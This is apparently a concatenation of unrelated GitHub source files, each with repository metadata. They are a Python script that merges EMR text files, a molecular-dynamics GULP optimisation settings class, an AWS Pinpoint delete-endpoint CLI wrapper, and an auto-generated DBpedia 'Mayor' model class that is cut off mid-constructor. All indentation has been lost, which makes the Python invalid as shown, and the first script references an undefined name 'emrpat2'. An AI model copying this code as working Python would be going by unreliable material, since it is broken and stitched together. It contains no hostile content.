0a06a2b02ea2ebe7e1e750ff6fcf6079526a4e8e | 53dd5d2cfb79edc87f6c606bbfb7d0bedcf6da61 | /.history/EMR/zhzd_add_20190618132817.py | d0748388e5fbee29a405014068576007a52ae777 | [] | no_license | cyc19950621/python | 4add54894dc81187211aa8d45e5115903b69a182 | d184b83e73334a37d413306d3694e14a19580cb0 | refs/heads/master | 2020-04-11T20:39:34.641303 | 2019-07-02T12:54:49 | 2019-07-02T12:54:49 | 162,078,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 766 | py | import time
import math
import os
import sys
import os, os.path,shutil
import codecs
import EMRdef
import re
import pandas as pd
emrtxts = EMRdef.txttq(u'D:\DeepLearning ER\EHRzhzd5')#txt目录提取
emrtxt2s = EMRdef.txttq(u'D:\DeepLearning ER\EHRsex')
ryzd = []
for emrtxt in emrtxts:
f = open(emrtxt,'r',errors="ignore")#中文加入errors
emrpath = os.path.basename(emrtxt)
emrpath = os.path.splitext(emrpath)[0]#提取目录
lines=f.readlines()
for emrtxt2 in emrtxt2s:
f2 = open(emrtxt2,'r',errors="ignore")#中文加入errors
emrpath2 = os.path.basename(emrtxt2)
emrpath2 = os.path.splitext(emrpat2)[0]#提取目录
lines2 = f2.readlines()
if emrpath == emrpath2:
lines.append(lines2) | [
"[email protected]"
] | |
953d8bc38856a27f6a9df03d5819e05e01559c06 | 646b0a41238b96748c7d879dd1bf81858651eb66 | /src/mdt/orm/GulpOpt.py | 177f7a316baa5b0cda918805763bfe60e8fcfac3 | [] | no_license | danse-inelastic/molDynamics | ded0298f8219064e086472299e1383d3dff2dac3 | c8e0bfd9cb65bcfc238e7993b6e7550289d2b219 | refs/heads/master | 2021-01-01T19:42:29.904390 | 2015-05-03T17:27:38 | 2015-05-03T17:27:38 | 34,993,746 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,749 | py | #!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# J Brandon Keith, Jiao Lin
# California Institute of Technology
# (C) 2006-2011 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
from ..GulpOpt import GulpOpt
from Gulp import Gulp
class Inventory(Gulp.Inventory):
optimize_coordinates = Gulp.Inventory.d.bool(name = 'optimize_coordinates', default = True)
optimize_coordinates.label = 'Optimize coordinates?'
optimize_cell = Gulp.Inventory.d.bool(name = 'optimize_cell', default = False)
optimize_cell.label = 'Optimize the cell?'
constraint = Gulp.Inventory.d.str(name = 'constraint', default = 'constant volume')
constraint.label = 'Constraint'
constraint.validator = Gulp.Inventory.v.choice(['None', 'constant volume', 'constant pressure'])
# XXX: see Gulp.py
# trajectoryfile = Gulp.Inventory.d.str(name = 'trajectoryfile', default = 'gulp.his')
# trajectoryfile.label = 'Trajectory Filename'
# restartfile = Gulp.Inventory.d.str(name = 'restartfile', default = 'gulp.res')
# restartfile.label = 'Restart Filename'
GulpOpt.Inventory = Inventory
def customizeLubanObjectDrawer(self, drawer):
drawer.sequence = ['properties', 'forcefield']
drawer.mold.sequence = [
'optimize_coordinates',
'optimize_cell',
'constraint',
'temperature', 'pressure',
'identify_molecules',
'assign_bonds_from_initial_geometry',
'calc_dispersion_in_recip_space',
]
return
GulpOpt.customizeLubanObjectDrawer = customizeLubanObjectDrawer
| [
"[email protected]"
] | |
01b65fa62f033ee2bb173040766119fcba0b4fe2 | 91d1a6968b90d9d461e9a2ece12b465486e3ccc2 | /pinpoint_write_2/endpoint_delete.py | cf53331aefddda4f6a700adcbf0325709acdb957 | [] | no_license | lxtxl/aws_cli | c31fc994c9a4296d6bac851e680d5adbf7e93481 | aaf35df1b7509abf5601d3f09ff1fece482facda | refs/heads/master | 2023-02-06T09:00:33.088379 | 2020-12-27T13:38:45 | 2020-12-27T13:38:45 | 318,686,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,101 | py | #!/usr/bin/python
# -*- codding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import write_two_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/pinpoint/delete-endpoint.html
if __name__ == '__main__':
"""
get-endpoint : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/pinpoint/get-endpoint.html
update-endpoint : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/pinpoint/update-endpoint.html
"""
parameter_display_string = """
# application-id : The unique identifier for the application. This identifier is displayed as the Project ID on the Amazon Pinpoint console.
# endpoint-id : The unique identifier for the endpoint.
"""
add_option_dict = {}
add_option_dict["parameter_display_string"] = parameter_display_string
# ex: add_option_dict["no_value_parameter_list"] = "--single-parameter"
write_two_parameter("pinpoint", "delete-endpoint", "application-id", "endpoint-id", add_option_dict)
| [
"[email protected]"
] | |
702d222428773d4309d41c11af3522790b2d2bc0 | 59166105545cdd87626d15bf42e60a9ee1ef2413 | /dbpedia/models/mayor.py | 6526d40de4f17f276f8ee52b9b8af54cfc7af7e8 | [] | no_license | mosoriob/dbpedia_api_client | 8c594fc115ce75235315e890d55fbf6bd555fa85 | 8d6f0d04a3a30a82ce0e9277e4c9ce00ecd0c0cc | refs/heads/master | 2022-11-20T01:42:33.481024 | 2020-05-12T23:22:54 | 2020-05-12T23:22:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 233,338 | py | # coding: utf-8
"""
DBpedia
This is the API of the DBpedia Ontology # noqa: E501
The version of the OpenAPI document: v0.0.1
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from dbpedia.configuration import Configuration
class Mayor(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'parent': 'list[object]',
'viaf_id': 'list[str]',
'competition_title': 'list[object]',
'art_patron': 'list[object]',
'hair_colour': 'list[str]',
'tv_show': 'list[object]',
'expedition': 'list[str]',
'main_domain': 'list[object]',
'nndb_id': 'list[str]',
'discipline': 'list[object]',
'consecration': 'list[str]',
'salary': 'list[float]',
'birth_name': 'list[str]',
'spouse': 'list[object]',
'scene': 'list[str]',
'best_lap': 'list[str]',
'shoe_number': 'list[int]',
'mayor_mandate': 'list[str]',
'friend': 'list[object]',
'full_score': 'list[str]',
'diploma': 'list[object]',
'active_years_end_year_mgr': 'list[str]',
'abbeychurch_blessing': 'list[str]',
'height': 'list[object]',
'usopen_wins': 'list[object]',
'bust_size': 'list[float]',
'cloth_size': 'list[str]',
'handedness': 'list[object]',
'philosophical_school': 'list[object]',
'parliamentary_group': 'list[str]',
'date_of_burial': 'list[str]',
'mount': 'list[str]',
'olympic_games_silver': 'list[int]',
'nationality': 'list[object]',
'junior_years_start_year': 'list[str]',
'relative': 'list[object]',
'newspaper': 'list[object]',
'announced_from': 'list[object]',
'military_branch': 'list[object]',
'activity': 'list[object]',
'ethnicity': 'list[object]',
'state_of_origin': 'list[object]',
'pole_position': 'list[int]',
'season_manager': 'list[str]',
'killed_by': 'list[str]',
'blood_type': 'list[object]',
'continental_tournament': 'list[object]',
'junior_years_end_year': 'list[str]',
'political_function': 'list[str]',
'honours': 'list[object]',
'olympic_games': 'list[object]',
'hair_color': 'list[object]',
'foot': 'list[str]',
'measurements': 'list[str]',
'hand': 'list[object]',
'federation': 'list[object]',
'circumcised': 'list[str]',
'penis_length': 'list[str]',
'coemperor': 'list[object]',
'detractor': 'list[object]',
'selibr_id': 'list[str]',
'danse_competition': 'list[str]',
'sex': 'list[str]',
'sexual_orientation': 'list[object]',
'partner': 'list[object]',
'birth_year': 'list[str]',
'sports_function': 'list[str]',
'orcid_id': 'list[str]',
'election_date': 'list[str]',
'sport_discipline': 'list[object]',
'collaboration': 'list[object]',
'national_team_year': 'list[str]',
'number_of_run': 'list[int]',
'spouse_name': 'list[str]',
'lah_hof': 'list[str]',
'derived_word': 'list[str]',
'current_team_manager': 'list[object]',
'little_pool_record': 'list[str]',
'bpn_id': 'list[str]',
'free_danse_score': 'list[str]',
'project': 'list[object]',
'active_years': 'list[object]',
'title_date': 'list[str]',
'blood_group': 'list[str]',
'school': 'list[object]',
'death_place': 'list[object]',
'victory_percentage_as_mgr': 'list[float]',
'imposed_danse_competition': 'list[str]',
'shoot': 'list[str]',
'education_place': 'list[object]',
'match_point': 'list[str]',
'reign_name': 'list[str]',
'pro_period': 'list[str]',
'influenced_by': 'list[object]',
'nla_id': 'list[str]',
'cousurper': 'list[object]',
'race_wins': 'list[int]',
'world_tournament_bronze': 'list[int]',
'jutsu': 'list[str]',
'weight': 'list[object]',
'other_media': 'list[object]',
'alma_mater': 'list[object]',
'imposed_danse_score': 'list[str]',
'known_for': 'list[object]',
'big_pool_record': 'list[str]',
'olympic_games_wins': 'list[str]',
'eye_colour': 'list[str]',
'world_tournament_silver': 'list[int]',
'architectural_movement': 'list[str]',
'mood': 'list[str]',
'bibsys_id': 'list[str]',
'iihf_hof': 'list[str]',
'free_prog_score': 'list[str]',
'description': 'list[str]',
'particular_sign': 'list[str]',
'league_manager': 'list[object]',
'junior_season': 'list[object]',
'free_prog_competition': 'list[str]',
'weapon': 'list[object]',
'kind_of_criminal': 'list[str]',
'notable_idea': 'list[object]',
'player_status': 'list[str]',
'other_function': 'list[object]',
'continental_tournament_silver': 'list[int]',
'career_station': 'list[object]',
'resting_place_position': 'list[object]',
'original_danse_competition': 'list[str]',
'status_manager': 'list[str]',
'national_tournament': 'list[object]',
'hometown': 'list[object]',
'dead_in_fight_place': 'list[str]',
'continental_tournament_bronze': 'list[int]',
'victory': 'list[int]',
'complexion': 'list[object]',
'citizenship': 'list[object]',
'start': 'list[int]',
'tessitura': 'list[str]',
'start_career': 'list[str]',
'label': 'list[str]',
'birth_date': 'list[str]',
'national_tournament_silver': 'list[int]',
'other_activity': 'list[str]',
'linguistics_tradition': 'list[object]',
'national_tournament_bronze': 'list[int]',
'escalafon': 'list[str]',
'sibling': 'list[object]',
'waist_size': 'list[float]',
'olympic_games_gold': 'list[int]',
'general_council': 'list[object]',
'arrest_date': 'list[str]',
'team_manager': 'list[object]',
'birth_sign': 'list[object]',
'artistic_function': 'list[str]',
'age': 'list[int]',
'college': 'list[object]',
'education': 'list[object]',
'movie': 'list[object]',
'achievement': 'list[object]',
'death_age': 'list[int]',
'type': 'list[str]',
'approach': 'list[object]',
'relation': 'list[object]',
'victory_as_mgr': 'list[int]',
'living_place': 'list[object]',
'copilote': 'list[object]',
'season': 'list[object]',
'start_wct': 'list[str]',
'catch': 'list[str]',
'id': 'str',
'feat': 'list[str]',
'decoration': 'list[object]',
'case': 'list[str]',
'sentence': 'list[str]',
'profession': 'list[object]',
'retirement_date': 'list[str]',
'world_tournament': 'list[object]',
'wife': 'list[object]',
'allegiance': 'list[str]',
'active_years_start_date_mgr': 'list[str]',
'lccn_id': 'list[str]',
'tattoo': 'list[str]',
'british_wins': 'list[object]',
'hip_size': 'list[float]',
'podium': 'list[int]',
'seiyu': 'list[object]',
'player_season': 'list[object]',
'short_prog_score': 'list[str]',
'regional_council': 'list[object]',
'homage': 'list[str]',
'shoe_size': 'list[str]',
'signature': 'list[str]',
'olympic_games_bronze': 'list[int]',
'danse_score': 'list[str]',
'id_number': 'list[int]',
'short_prog_competition': 'list[str]',
'active_years_start_year_mgr': 'list[str]',
'wedding_parents_date': 'list[str]',
'birth_place': 'list[object]',
'world': 'list[object]',
'astrological_sign': 'list[object]',
'eye_color': 'list[object]',
'networth': 'list[float]',
'coalition': 'list[str]',
'national_team_match_point': 'list[str]',
'national_selection': 'list[object]',
'agency': 'list[object]',
'start_wqs': 'list[str]',
'defeat_as_mgr': 'list[int]',
'death_year': 'list[str]',
'world_tournament_gold': 'list[int]',
'pga_wins': 'list[object]',
'board': 'list[object]',
'rid_id': 'list[str]',
'dead_in_fight_date': 'list[str]',
'related_functions': 'list[object]',
'manager_season': 'list[object]',
'reign': 'list[str]',
'second': 'list[int]',
'radio': 'list[object]',
'full_competition': 'list[str]',
'free_score_competition': 'list[str]',
'prefect': 'list[object]',
'publication': 'list[str]',
'opponent': 'list[object]',
'employer': 'list[object]',
'affair': 'list[str]',
'body_discovered': 'list[object]',
'buried_place': 'list[object]',
'residence': 'list[object]',
'usurper': 'list[object]',
'other_occupation': 'list[object]',
'contest': 'list[object]',
'active_years_end_date_mgr': 'list[str]',
'created': 'list[object]',
'original_danse_score': 'list[str]',
'end_career': 'list[str]',
'note_on_resting_place': 'list[str]',
'army': 'list[str]',
'active_year': 'list[str]',
'person_function': 'list[object]',
'pro_since': 'list[str]',
'cause_of_death': 'list[str]',
'dubber': 'list[object]',
'non_professional_career': 'list[str]',
'military_function': 'list[str]',
'patent': 'list[object]',
'creation_christian_bishop': 'list[str]',
'piercing': 'list[str]',
'student': 'list[object]',
'bad_guy': 'list[str]',
'influenced': 'list[object]',
'start_reign': 'list[object]',
'university': 'list[object]',
'gym_apparatus': 'list[object]',
'ideology': 'list[object]',
'conviction_date': 'list[str]',
'media': 'list[object]',
'bnf_id': 'list[str]',
'pseudonym': 'list[str]',
'temple_year': 'list[str]',
'clothing_size': 'list[str]',
'speciality': 'list[str]',
'award': 'list[object]',
'kind_of_criminal_action': 'list[str]',
'isni_id': 'list[str]',
'significant_project': 'list[object]',
'leadership': 'list[str]',
'death_date': 'list[str]',
'special_trial': 'list[int]',
'resting_date': 'list[str]',
'victim': 'list[str]',
'has_natural_bust': 'list[str]',
'masters_wins': 'list[object]',
'individualised_pnd': 'list[int]',
'continental_tournament_gold': 'list[int]',
'orientation': 'list[str]',
'grave': 'list[str]',
'resting_place': 'list[object]',
'abbeychurch_blessing_charge': 'list[str]',
'handisport': 'list[str]',
'external_ornament': 'list[str]',
'third': 'list[int]',
'film_number': 'list[int]',
'temple': 'list[str]',
'end_reign': 'list[object]',
'national_tournament_gold': 'list[int]',
'death_cause': 'list[object]'
}
attribute_map = {
'parent': 'parent',
'viaf_id': 'viafId',
'competition_title': 'competitionTitle',
'art_patron': 'artPatron',
'hair_colour': 'hairColour',
'tv_show': 'tvShow',
'expedition': 'expedition',
'main_domain': 'mainDomain',
'nndb_id': 'nndbId',
'discipline': 'discipline',
'consecration': 'consecration',
'salary': 'salary',
'birth_name': 'birthName',
'spouse': 'spouse',
'scene': 'scene',
'best_lap': 'bestLap',
'shoe_number': 'shoeNumber',
'mayor_mandate': 'mayorMandate',
'friend': 'friend',
'full_score': 'fullScore',
'diploma': 'diploma',
'active_years_end_year_mgr': 'activeYearsEndYearMgr',
'abbeychurch_blessing': 'abbeychurchBlessing',
'height': 'height',
'usopen_wins': 'usopenWins',
'bust_size': 'bustSize',
'cloth_size': 'clothSize',
'handedness': 'handedness',
'philosophical_school': 'philosophicalSchool',
'parliamentary_group': 'parliamentaryGroup',
'date_of_burial': 'dateOfBurial',
'mount': 'mount',
'olympic_games_silver': 'olympicGamesSilver',
'nationality': 'nationality',
'junior_years_start_year': 'juniorYearsStartYear',
'relative': 'relative',
'newspaper': 'newspaper',
'announced_from': 'announcedFrom',
'military_branch': 'militaryBranch',
'activity': 'activity',
'ethnicity': 'ethnicity',
'state_of_origin': 'stateOfOrigin',
'pole_position': 'polePosition',
'season_manager': 'seasonManager',
'killed_by': 'killedBy',
'blood_type': 'bloodType',
'continental_tournament': 'continentalTournament',
'junior_years_end_year': 'juniorYearsEndYear',
'political_function': 'politicalFunction',
'honours': 'honours',
'olympic_games': 'olympicGames',
'hair_color': 'hairColor',
'foot': 'foot',
'measurements': 'measurements',
'hand': 'hand',
'federation': 'federation',
'circumcised': 'circumcised',
'penis_length': 'penisLength',
'coemperor': 'coemperor',
'detractor': 'detractor',
'selibr_id': 'selibrId',
'danse_competition': 'danseCompetition',
'sex': 'sex',
'sexual_orientation': 'sexualOrientation',
'partner': 'partner',
'birth_year': 'birthYear',
'sports_function': 'sportsFunction',
'orcid_id': 'orcidId',
'election_date': 'electionDate',
'sport_discipline': 'sportDiscipline',
'collaboration': 'collaboration',
'national_team_year': 'nationalTeamYear',
'number_of_run': 'numberOfRun',
'spouse_name': 'spouseName',
'lah_hof': 'lahHof',
'derived_word': 'derivedWord',
'current_team_manager': 'currentTeamManager',
'little_pool_record': 'littlePoolRecord',
'bpn_id': 'bpnId',
'free_danse_score': 'freeDanseScore',
'project': 'project',
'active_years': 'activeYears',
'title_date': 'titleDate',
'blood_group': 'bloodGroup',
'school': 'school',
'death_place': 'deathPlace',
'victory_percentage_as_mgr': 'victoryPercentageAsMgr',
'imposed_danse_competition': 'imposedDanseCompetition',
'shoot': 'shoot',
'education_place': 'educationPlace',
'match_point': 'matchPoint',
'reign_name': 'reignName',
'pro_period': 'proPeriod',
'influenced_by': 'influencedBy',
'nla_id': 'nlaId',
'cousurper': 'cousurper',
'race_wins': 'raceWins',
'world_tournament_bronze': 'worldTournamentBronze',
'jutsu': 'jutsu',
'weight': 'weight',
'other_media': 'otherMedia',
'alma_mater': 'almaMater',
'imposed_danse_score': 'imposedDanseScore',
'known_for': 'knownFor',
'big_pool_record': 'bigPoolRecord',
'olympic_games_wins': 'olympicGamesWins',
'eye_colour': 'eyeColour',
'world_tournament_silver': 'worldTournamentSilver',
'architectural_movement': 'architecturalMovement',
'mood': 'mood',
'bibsys_id': 'bibsysId',
'iihf_hof': 'iihfHof',
'free_prog_score': 'freeProgScore',
'description': 'description',
'particular_sign': 'particularSign',
'league_manager': 'leagueManager',
'junior_season': 'juniorSeason',
'free_prog_competition': 'freeProgCompetition',
'weapon': 'weapon',
'kind_of_criminal': 'kindOfCriminal',
'notable_idea': 'notableIdea',
'player_status': 'playerStatus',
'other_function': 'otherFunction',
'continental_tournament_silver': 'continentalTournamentSilver',
'career_station': 'careerStation',
'resting_place_position': 'restingPlacePosition',
'original_danse_competition': 'originalDanseCompetition',
'status_manager': 'statusManager',
'national_tournament': 'nationalTournament',
'hometown': 'hometown',
'dead_in_fight_place': 'deadInFightPlace',
'continental_tournament_bronze': 'continentalTournamentBronze',
'victory': 'victory',
'complexion': 'complexion',
'citizenship': 'citizenship',
'start': 'start',
'tessitura': 'tessitura',
'start_career': 'startCareer',
'label': 'label',
'birth_date': 'birthDate',
'national_tournament_silver': 'nationalTournamentSilver',
'other_activity': 'otherActivity',
'linguistics_tradition': 'linguisticsTradition',
'national_tournament_bronze': 'nationalTournamentBronze',
'escalafon': 'escalafon',
'sibling': 'sibling',
'waist_size': 'waistSize',
'olympic_games_gold': 'olympicGamesGold',
'general_council': 'generalCouncil',
'arrest_date': 'arrestDate',
'team_manager': 'teamManager',
'birth_sign': 'birthSign',
'artistic_function': 'artisticFunction',
'age': 'age',
'college': 'college',
'education': 'education',
'movie': 'movie',
'achievement': 'achievement',
'death_age': 'deathAge',
'type': 'type',
'approach': 'approach',
'relation': 'relation',
'victory_as_mgr': 'victoryAsMgr',
'living_place': 'livingPlace',
'copilote': 'copilote',
'season': 'season',
'start_wct': 'startWct',
'catch': 'catch',
'id': 'id',
'feat': 'feat',
'decoration': 'decoration',
'case': 'case',
'sentence': 'sentence',
'profession': 'profession',
'retirement_date': 'retirementDate',
'world_tournament': 'worldTournament',
'wife': 'wife',
'allegiance': 'allegiance',
'active_years_start_date_mgr': 'activeYearsStartDateMgr',
'lccn_id': 'lccnId',
'tattoo': 'tattoo',
'british_wins': 'britishWins',
'hip_size': 'hipSize',
'podium': 'podium',
'seiyu': 'seiyu',
'player_season': 'playerSeason',
'short_prog_score': 'shortProgScore',
'regional_council': 'regionalCouncil',
'homage': 'homage',
'shoe_size': 'shoeSize',
'signature': 'signature',
'olympic_games_bronze': 'olympicGamesBronze',
'danse_score': 'danseScore',
'id_number': 'idNumber',
'short_prog_competition': 'shortProgCompetition',
'active_years_start_year_mgr': 'activeYearsStartYearMgr',
'wedding_parents_date': 'weddingParentsDate',
'birth_place': 'birthPlace',
'world': 'world',
'astrological_sign': 'astrologicalSign',
'eye_color': 'eyeColor',
'networth': 'networth',
'coalition': 'coalition',
'national_team_match_point': 'nationalTeamMatchPoint',
'national_selection': 'nationalSelection',
'agency': 'agency',
'start_wqs': 'startWqs',
'defeat_as_mgr': 'defeatAsMgr',
'death_year': 'deathYear',
'world_tournament_gold': 'worldTournamentGold',
'pga_wins': 'pgaWins',
'board': 'board',
'rid_id': 'ridId',
'dead_in_fight_date': 'deadInFightDate',
'related_functions': 'relatedFunctions',
'manager_season': 'managerSeason',
'reign': 'reign',
'second': 'second',
'radio': 'radio',
'full_competition': 'fullCompetition',
'free_score_competition': 'freeScoreCompetition',
'prefect': 'prefect',
'publication': 'publication',
'opponent': 'opponent',
'employer': 'employer',
'affair': 'affair',
'body_discovered': 'bodyDiscovered',
'buried_place': 'buriedPlace',
'residence': 'residence',
'usurper': 'usurper',
'other_occupation': 'otherOccupation',
'contest': 'contest',
'active_years_end_date_mgr': 'activeYearsEndDateMgr',
'created': 'created',
'original_danse_score': 'originalDanseScore',
'end_career': 'endCareer',
'note_on_resting_place': 'noteOnRestingPlace',
'army': 'army',
'active_year': 'activeYear',
'person_function': 'personFunction',
'pro_since': 'proSince',
'cause_of_death': 'causeOfDeath',
'dubber': 'dubber',
'non_professional_career': 'nonProfessionalCareer',
'military_function': 'militaryFunction',
'patent': 'patent',
'creation_christian_bishop': 'creationChristianBishop',
'piercing': 'piercing',
'student': 'student',
'bad_guy': 'badGuy',
'influenced': 'influenced',
'start_reign': 'startReign',
'university': 'university',
'gym_apparatus': 'gymApparatus',
'ideology': 'ideology',
'conviction_date': 'convictionDate',
'media': 'media',
'bnf_id': 'bnfId',
'pseudonym': 'pseudonym',
'temple_year': 'templeYear',
'clothing_size': 'clothingSize',
'speciality': 'speciality',
'award': 'award',
'kind_of_criminal_action': 'kindOfCriminalAction',
'isni_id': 'isniId',
'significant_project': 'significantProject',
'leadership': 'leadership',
'death_date': 'deathDate',
'special_trial': 'specialTrial',
'resting_date': 'restingDate',
'victim': 'victim',
'has_natural_bust': 'hasNaturalBust',
'masters_wins': 'mastersWins',
'individualised_pnd': 'individualisedPnd',
'continental_tournament_gold': 'continentalTournamentGold',
'orientation': 'orientation',
'grave': 'grave',
'resting_place': 'restingPlace',
'abbeychurch_blessing_charge': 'abbeychurchBlessingCharge',
'handisport': 'handisport',
'external_ornament': 'externalOrnament',
'third': 'third',
'film_number': 'filmNumber',
'temple': 'temple',
'end_reign': 'endReign',
'national_tournament_gold': 'nationalTournamentGold',
'death_cause': 'deathCause'
}
def __init__(self, parent=None, viaf_id=None, competition_title=None, art_patron=None, hair_colour=None, tv_show=None, expedition=None, main_domain=None, nndb_id=None, discipline=None, consecration=None, salary=None, birth_name=None, spouse=None, scene=None, best_lap=None, shoe_number=None, mayor_mandate=None, friend=None, full_score=None, diploma=None, active_years_end_year_mgr=None, abbeychurch_blessing=None, height=None, usopen_wins=None, bust_size=None, cloth_size=None, handedness=None, philosophical_school=None, parliamentary_group=None, date_of_burial=None, mount=None, olympic_games_silver=None, nationality=None, junior_years_start_year=None, relative=None, newspaper=None, announced_from=None, military_branch=None, activity=None, ethnicity=None, state_of_origin=None, pole_position=None, season_manager=None, killed_by=None, blood_type=None, continental_tournament=None, junior_years_end_year=None, political_function=None, honours=None, olympic_games=None, hair_color=None, foot=None, measurements=None, hand=None, federation=None, circumcised=None, penis_length=None, coemperor=None, detractor=None, selibr_id=None, danse_competition=None, sex=None, sexual_orientation=None, partner=None, birth_year=None, sports_function=None, orcid_id=None, election_date=None, sport_discipline=None, collaboration=None, national_team_year=None, number_of_run=None, spouse_name=None, lah_hof=None, derived_word=None, current_team_manager=None, little_pool_record=None, bpn_id=None, free_danse_score=None, project=None, active_years=None, title_date=None, blood_group=None, school=None, death_place=None, victory_percentage_as_mgr=None, imposed_danse_competition=None, shoot=None, education_place=None, match_point=None, reign_name=None, pro_period=None, influenced_by=None, nla_id=None, cousurper=None, race_wins=None, world_tournament_bronze=None, jutsu=None, weight=None, other_media=None, alma_mater=None, imposed_danse_score=None, known_for=None, big_pool_record=None, olympic_games_wins=None, eye_colour=None, world_tournament_silver=None, architectural_movement=None, mood=None, bibsys_id=None, iihf_hof=None, free_prog_score=None, description=None, particular_sign=None, league_manager=None, junior_season=None, free_prog_competition=None, weapon=None, kind_of_criminal=None, notable_idea=None, player_status=None, other_function=None, continental_tournament_silver=None, career_station=None, resting_place_position=None, original_danse_competition=None, status_manager=None, national_tournament=None, hometown=None, dead_in_fight_place=None, continental_tournament_bronze=None, victory=None, complexion=None, citizenship=None, start=None, tessitura=None, start_career=None, label=None, birth_date=None, national_tournament_silver=None, other_activity=None, linguistics_tradition=None, national_tournament_bronze=None, escalafon=None, sibling=None, waist_size=None, olympic_games_gold=None, general_council=None, arrest_date=None, team_manager=None, birth_sign=None, artistic_function=None, age=None, college=None, education=None, movie=None, achievement=None, death_age=None, type=None, approach=None, relation=None, victory_as_mgr=None, living_place=None, copilote=None, season=None, start_wct=None, catch=None, id=None, feat=None, decoration=None, case=None, sentence=None, profession=None, retirement_date=None, world_tournament=None, wife=None, allegiance=None, active_years_start_date_mgr=None, lccn_id=None, tattoo=None, british_wins=None, hip_size=None, podium=None, seiyu=None, player_season=None, short_prog_score=None, regional_council=None, homage=None, shoe_size=None, signature=None, olympic_games_bronze=None, danse_score=None, id_number=None, short_prog_competition=None, active_years_start_year_mgr=None, wedding_parents_date=None, birth_place=None, world=None, astrological_sign=None, eye_color=None, networth=None, coalition=None, national_team_match_point=None, national_selection=None, agency=None, start_wqs=None, defeat_as_mgr=None, death_year=None, world_tournament_gold=None, pga_wins=None, board=None, rid_id=None, dead_in_fight_date=None, related_functions=None, manager_season=None, reign=None, second=None, radio=None, full_competition=None, free_score_competition=None, prefect=None, publication=None, opponent=None, employer=None, affair=None, body_discovered=None, buried_place=None, residence=None, usurper=None, other_occupation=None, contest=None, active_years_end_date_mgr=None, created=None, original_danse_score=None, end_career=None, note_on_resting_place=None, army=None, active_year=None, person_function=None, pro_since=None, cause_of_death=None, dubber=None, non_professional_career=None, military_function=None, patent=None, creation_christian_bishop=None, piercing=None, student=None, bad_guy=None, influenced=None, start_reign=None, university=None, gym_apparatus=None, ideology=None, conviction_date=None, media=None, bnf_id=None, pseudonym=None, temple_year=None, clothing_size=None, speciality=None, award=None, kind_of_criminal_action=None, isni_id=None, significant_project=None, leadership=None, death_date=None, special_trial=None, resting_date=None, victim=None, has_natural_bust=None, masters_wins=None, individualised_pnd=None, continental_tournament_gold=None, orientation=None, grave=None, resting_place=None, abbeychurch_blessing_charge=None, handisport=None, external_ornament=None, third=None, film_number=None, temple=None, end_reign=None, national_tournament_gold=None, death_cause=None, local_vars_configuration=None): # noqa: E501
"""Mayor - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._parent = None
self._viaf_id = None
self._competition_title = None
self._art_patron = None
self._hair_colour = None
self._tv_show = None
self._expedition = None
self._main_domain = None
self._nndb_id = None
self._discipline = None
self._consecration = None
self._salary = None
self._birth_name = None
self._spouse = None
self._scene = None
self._best_lap = None
self._shoe_number = None
self._mayor_mandate = None
self._friend = None
self._full_score = None
self._diploma = None
self._active_years_end_year_mgr = None
self._abbeychurch_blessing = None
self._height = None
self._usopen_wins = None
self._bust_size = None
self._cloth_size = None
self._handedness = None
self._philosophical_school = None
self._parliamentary_group = None
self._date_of_burial = None
self._mount = None
self._olympic_games_silver = None
self._nationality = None
self._junior_years_start_year = None
self._relative = None
self._newspaper = None
self._announced_from = None
self._military_branch = None
self._activity = None
self._ethnicity = None
self._state_of_origin = None
self._pole_position = None
self._season_manager = None
self._killed_by = None
self._blood_type = None
self._continental_tournament = None
self._junior_years_end_year = None
self._political_function = None
self._honours = None
self._olympic_games = None
self._hair_color = None
self._foot = None
self._measurements = None
self._hand = None
self._federation = None
self._circumcised = None
self._penis_length = None
self._coemperor = None
self._detractor = None
self._selibr_id = None
self._danse_competition = None
self._sex = None
self._sexual_orientation = None
self._partner = None
self._birth_year = None
self._sports_function = None
self._orcid_id = None
self._election_date = None
self._sport_discipline = None
self._collaboration = None
self._national_team_year = None
self._number_of_run = None
self._spouse_name = None
self._lah_hof = None
self._derived_word = None
self._current_team_manager = None
self._little_pool_record = None
self._bpn_id = None
self._free_danse_score = None
self._project = None
self._active_years = None
self._title_date = None
self._blood_group = None
self._school = None
self._death_place = None
self._victory_percentage_as_mgr = None
self._imposed_danse_competition = None
self._shoot = None
self._education_place = None
self._match_point = None
self._reign_name = None
self._pro_period = None
self._influenced_by = None
self._nla_id = None
self._cousurper = None
self._race_wins = None
self._world_tournament_bronze = None
self._jutsu = None
self._weight = None
self._other_media = None
self._alma_mater = None
self._imposed_danse_score = None
self._known_for = None
self._big_pool_record = None
self._olympic_games_wins = None
self._eye_colour = None
self._world_tournament_silver = None
self._architectural_movement = None
self._mood = None
self._bibsys_id = None
self._iihf_hof = None
self._free_prog_score = None
self._description = None
self._particular_sign = None
self._league_manager = None
self._junior_season = None
self._free_prog_competition = None
self._weapon = None
self._kind_of_criminal = None
self._notable_idea = None
self._player_status = None
self._other_function = None
self._continental_tournament_silver = None
self._career_station = None
self._resting_place_position = None
self._original_danse_competition = None
self._status_manager = None
self._national_tournament = None
self._hometown = None
self._dead_in_fight_place = None
self._continental_tournament_bronze = None
self._victory = None
self._complexion = None
self._citizenship = None
self._start = None
self._tessitura = None
self._start_career = None
self._label = None
self._birth_date = None
